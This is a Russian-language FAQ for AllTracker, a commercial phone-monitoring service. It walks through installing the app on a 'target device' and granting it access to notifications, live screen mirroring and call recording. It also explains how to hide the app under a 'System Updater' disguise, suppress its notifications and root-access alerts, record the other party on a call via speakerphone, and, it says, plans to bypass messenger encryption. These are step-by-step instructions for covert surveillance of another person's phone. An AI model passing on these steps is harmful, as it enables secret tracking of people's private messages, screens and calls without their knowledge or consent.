Как подключить телефон к сайту?

1. Загрузите приложение, используя эту ссылку: Скачать приложение
2. Установите и запустите приложение на целевом устройстве (которое должно мониториться)

3. Нажмите на ПОДКЛЮЧИТЬ

4. Нажмите на ОПТИМИЗИРОВАТЬ ПРОГРАММУ, чтобы быть уверенным, что приложение не будет остановленно системой и всегда будет работать

5. Нажмите на ПРЕДОСТАВЬТЕ ВСЕ НЕОБХОДИМЫЕ РАЗРЕШЕНИЯ, чтобы приложение могло получить доступ ко всем данным, которые вы запросите с этого веб-сайта

6. Нажмите на РАЗРЕШИТЬ ЧИТАТЬ ОПОВЕЩЕНИЯ, если вы хотите читать все входящие сообщения с устройства


7. Нажмите на РАЗРЕШИТЬ ДУБЛИРОВАНИЕ ЭКРАНА, если вы хотите вживую наблюдать за экраном устройства через этот сайт

8. Перейдите по ссылке alltracker.org/code, чтобы получить код подключения к вашему аккаунту

9. Введите предоставленный вам код на том устройстве, которое вы хотите контролировать, или просто просканируйте QR-код

10. Готово! Ваше устройство подключено к вашей учётной записи и теперь вы можете мониторить его в разделе сайта Мониторинг

Смотрите видео, как подключить телефон к вашему аккаунту :

Как работает платёжная система?

Абонемент: Подписка на неограниченные запросы

- Как часто я плачу и за что?
Вы вносите ежемесячную либо годовую плату за доступ ко всем услугам сервиса, включая живую передачу звука и видео, за исключением функции «Использовать фавориты» в тарифном плане BRONZE. Продление на следующий период будет производиться автоматически, если подписка не будет отменена в оплаченный период.

- Сколько устройств я могу отслеживать?
Это зависит от тарифного плана, который вы абонируете: BRONZE - 1 устройство, SILVER - до 3 устройств, GOLD - до 5 устройств.


Предоплата: Разовая покупка

- Будут ли с меня сниматься регулярно деньги при предоплате?
При подключении тарифного плана посредством предолаты, вы совершаете единоразовую покупку на желаемый срок. Деньги регулярно сниматься не будут. Как только оплаченный период закончится, подписка автоматически отключится. После этого можно будет подписаться на любой из тарифов ещё раз.

- Сколько устройств я могу подключить через предоплату?
Это зависит от тарифного плана, который у вас подключён: BRONZE - 1 устройство, SILVER - до 3 устройств, GOLD - до 5 устройств.


Пробный период

При регистрации на сайте вы получаете бесплатный доступ ко всем услугам сервиса в течении 6 часов.


Если у вас есть какие-либо проблемы с подпиской, оплатой, или вы считаете, что с вас были неверно сняты деньги, то обратитесь к нам через службу поддержки, мы постараемся в короткие сроки решить вашу проблему.

Как обновить или отключить подписку?

- Я хочу поменять тарифный план на более высокий (апгрейд). Нужно ли мне ждать до конца текущего периода, чтобы с меня не сняли полную сумму за новый тариф?
Сделать апгрейд действующего тарифа, например, BRONZE на GOLD, можно в любое время. В этом случае сумма, не использованная в текущем периоде, будет перенесена в обновлённый тариф. Таким образом, вы заплатите только разницу в цене.

- Когда я могу отменить подписку? Будет ли доступ к сервису закрыт сразу, после того, как я отменю подписку?
Если вы подписаны на один из тарифных планов, то отменить (отключить) его можно в любое время. В этом случае ваш абонемент будет активным до конца платёжного периода. Когда подойдёт время к следующей оплате, ваш абонемент будет остановлен и деньги взиматься больше не будут.

- Могу ли я опять активировать подписку после отмены? С меня опять снимут деньги?
Если вы отменили вашу подписку, то вы можете в любой момент активировать её снова. В этом случае с вашего счёта не будет сниматься дополнительная плата. Следующая оплата будет произведена по окончании актуального платёжного периода.

- Как мне отменить подписку?
Для этого вам нужно перейти на сайте в свой "Профиль" и в разделе "Ваш абонемент" нажать на кнопку ОТМЕНИТЬ АБОНЕМЕНТ.

--->


Если у вас есть какие-либо проблемы с подпиской, оплатой, или вы считаете, что с вас были неверно сняты деньги, то обратитесь к нам через службу поддержки, мы постараемся в короткие сроки решить вашу проблему.

Как полностью удалить AllTracker с телефона?

Android < 6.0:
Зайдите в Настройки телефона, выберите Диспетчер приложений, затем AllTracker, после чего нажмите на ОЧИСТИТЬ ДАННЫЕ, и затем на УДАЛИТЬ.

Android > 6.0:
Зайдите в Настройки телефона, выберите Приложения, затем Диспетчер приложений, потом AllTracker, в нём Память, после чего нажмите на ОЧИСТИТЬ ДАННЫЕ и ОЧИСТИТЬ КЭШ, потом вернитесь на шаг назад и нажмите на кнопку УДАЛИТЬ.

Как убрать сообщение "Приложению AllTracker предоставлены права суперпользователя"?

Это сообщение появляется каждый раз, когда вы вызываете команду, которой нужны root-права:


Для того, чтобы убрать это сообщение, перейдите в настройки Суперпользователя и выберите Уведомления


Затем выберите Выключены

Почему мой телефон через какое-то время перестаёт отвечать на запросы с сайта, хотя программа установлена и зарегистрированна под моим аккаунтом?

1. Действие

1. Установите последнюю версию программы AllTracker Антивор v.5.6 или System Updater v.5.6 из раздела Установка.

2. После запуска программы нажмите на кнопку ПОДРОБНЕЕ.

3. Зайдите в Установки приложения

4. В разделе "Оптимизация" нажмите красную кнопку УСТАНОВИТЬ SERVICE CHECKER.

5. В том случае, если на вашем устройстве запрещены установки приложений, не полученных из Play Store, то сделайте в этот раз исключение для установки Service Checker. Процедура по смыслу одинакова на всех устройствах.


6. Установите флажок Неизвестные источники.

7. Подтвердите ваш выбор нажатием на ОК.

8. Нажмите УСТАНОВИТЬ.

9. И после установки программы на ГОТОВО.


10. Теперь, по возвращении в Установки AllTracker, нажмите на красную кнопку ЗАПУСТИТЬ SERVICE CHECKER.

11. В открывшемся окне выберите интервал проверки сервиса. Чем больше интервал, тем меньше будет расходоваться батарея, но реже будет проверяться работоспособнось сервиса. Рекомендуемый интервал - 3 минуты. Подтвердите ваш выбор нажав на кнопку ЗАПУСТИТЬ СЕРВИС.

12. Готово! Значок Service Checker смениться на зелёный, что означает, что он успешно запущен. С этого момента сервис будет в фоновом режиме следить за тем, чтобы AllTracker "не засыпал".

Service Chercker можно также скачать по этой ссылке.

2. Действие

Войдите в Настройки -> Батарея -> ПОДРОБНО -> Энергопотребление приложений. Поменяйте переключатель в положение Выключено!

-> ->
3. Действие

Проверте, установлена ли у вас программа Smart manager. Возможно она находится в настройках телефона:

 

Если да, то запустите её, и выберите Батарея.

Потом выберите ПОДРОБНО.

Убедитесь, что переключатель стоит в положении Выключено.

Как скрыть AllTracker и все его уведомления?

Если вы не хотите, чтобы значок AllTracker был виден в меню всех приложений, а также вы не хотите, чтобы AllTracker показывал при каждом запросе уведомление на контролируемом телефоне, то вам нужно:
1. Установить версию AllTracker Антивор или System Updater.
2. После установки и подключения программы к вашему аккаунту выбрать команду СКРЫТЬ ПРОГРАММУ, которая находится в разделе "Общие команды".



Подробности о версиях AllTracker и ссылки для скачивания находятся в разделе сайта Установка.

Примечание: даже после скрытия программы, её всегда можно будет найти в "диспетчере приложений".

Уведомления не отслеживаются! Что нужно сделать, чтобы заработало?

Для того, чтобы AllTracker мог отслеживать входящие уведомления, нужно дать ему соответсвующее право, если этого не было сделано при установке. Для этого нужно:
1. Открыть приложение на контролируемом телефоне и перейти в Установки.
2. В разделе "Оптимизация" нажать на красную кнопку ОТКРЫТЬ НАСТРОЙКИ.
3. В открывшемся окне "Уведомления о доступе" необходимо разрешить AllTracker доступ к уведомлениям, установив флажок!
4. Затем вернитесь назад и убедитесь, что иконка с оповещениями стала зелёной - это означает, что программа имеет доступ к входящим уведомлениям.
Возможно в уведомлениях появится сообщение от AllTracker о том, что у него есть доступ к уведомлениям. Его можно убрать, оно больше появлятся не будет.

Если программа по какой-либо причине всё ещё не получает уведомления, то попробуйте её полностью переустановить. Перед переустановкой, убедитесь, что программа полностью удалена с вашего телефона, как это описанно в пункте выше.

Как использовать купоны (скидка на подписку)?

1. Заходим на страницу с ценами и подписками сюда: Цены и Подписки.
2. Выбираем желаемый абонемент и нажимаем на "ПОДПИСАТЬСЯ".



3. После того, как вы заполнили поля с вашей кредитной карты, введите в поле "Купон" ваш купон на скидку!



4. Если купон и ваша карта действительны, то вы увидите информацию о скидке и её продолжительности.



5. В вашем профиле можно в любой момент посмотреть и отменить актуальную подписку.



Если по какой-либо причине что-то пошло не так, пожалуйста, обратитесь в Службу поддержки!

Почему при прослушивании записей телефонных разговоров слышно только меня?

В данном случае это не ошибка программы, а техническое ограничение устройства. Дело в том, что многие производители телефонов (например Samsung) намеренно встраивают ограничение для записи голоса собеседника, в виду того, что во многих странах это незаконно.

Выход из ситуации: при телефонном разговоре использовать "громкую связь". Таким образом вы сможете записать также и голос абонента.

Почему я вижу только входящие сообщения из ВКонтакте, Телеграм, Вайбер, WhatsApp и т. п.?

Наше приложение пока не поддерживает полное считывание переписок и чатов популярных мессенджеров, так как они хранятся в надёжно зашифрованом виде на телефоне и расшифровать такую информацию практически невозможно. Входящие же сообщения и прочие уведомления приходят в незашифрованном виде, поэтому их считывание является возможным.

Тем не менее мы ищем различные пути обхода шифрования и, возможно, в одном из следующих обновлений будет реализована функция полного считывания переписок, о чём будет обязательно указано в списке обновлений программы, а также в нашей новостной рассылке.

Как удалить аккаунт?

Для того чтобы удалить ваш аккаунт, совершите следующие шаги:

1. Перейдите в свой Профиль.



2. В разделе Личные настройки нажмите на ссылку "нажмите сюда".



3. Затем нажмите на появившуюся кнопку УДАЛИТЬ АККАУНТ.



4. И в заключение подтвердите удаление аккаунта нажатием на ОК.



Внимание: все ваши личные данные (кроме счетов за произведённые оплаты) будут удалены вместе с в вашим аккаунтом. Также вы больше не сможете зарегистрироваться на нашем сайте под тем же email-адресом.